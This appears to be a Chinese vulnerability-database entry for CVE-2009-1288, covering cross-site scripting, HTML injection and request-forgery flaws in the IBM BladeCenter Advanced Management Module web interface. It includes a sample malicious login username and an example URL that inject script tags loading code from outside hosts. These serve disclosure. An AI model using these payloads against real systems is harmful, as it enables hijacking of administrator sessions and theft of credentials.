IBM BladeCenter高级管理模块 多个跨站脚本和跨站请求伪造漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117560 漏洞类型 跨站脚本
发布时间 2009-04-09 更新时间 2009-04-18
CVE编号 CVE-2009-1288 CNNVD-ID CNNVD-200904-263
漏洞平台 Multiple CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/32895
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200904-263
|漏洞详情
IBMBladeCenter是美国IBM公司的系列高性能刀片服务器。BladeCenter所使用的高级管理模块(AMM)的Web管理接口没有正确地过滤用户所提交的输入和请求。如果用户使用恶意的凭据试图登录的话,AMM会在事件日志页面记录用户所提交的凭据,之后管理员查看事件日志时就会执行所注入的内容。例如,攻击者可以使用以下用户名登录导致注入:JavaScript:>/script<>scriptsrc="//l7.fi"<>/script<>script<
|漏洞EXP
source: http://www.securityfocus.com/bid/34447/info
 
IBM BladeCenter Advanced Management Module is prone to the following remote vulnerabilities:
 
- An HTML-injection vulnerability
- A cross-site scripting vulnerability
- An information-disclosure vulnerability
- Multiple cross-site request-forgery vulnerabilities
 
An attacker can exploit these issues to obtain sensitive information, execute arbitrary script code, steal cookie-based authentication credentials, and perform actions as an authenticated user of the application. Other attacks are also possible.
 
Versions prior to BladeCenter Advanced Management Module 1.42U are vulnerable. 

http://example.com/private/file_management.ssi?PATH=/etc"><script%20src="http://www.example.com"></script>
|参考资料

来源:BID
名称:34447
链接:http://www.securityfocus.com/bid/34447
来源:BUGTRAQ
名称:20090409IBMBladeCenterAdvancedManagementModuleMultiplevulnerabilities
链接:http://www.securityfocus.com/archive/1/archive/1/502582/100/0/threaded
来源:MISC
链接:http://www.louhinetworks.fi/advisory/ibm_090409.txt
来源:SECTRACK
名称:1022025
链接:http://securitytracker.com/id?1022025
来源:OSVDB
名称:53658
链接:http://osvdb.org/53658
来源:OSVDB
名称:53657
链接:http://osvdb.org/53657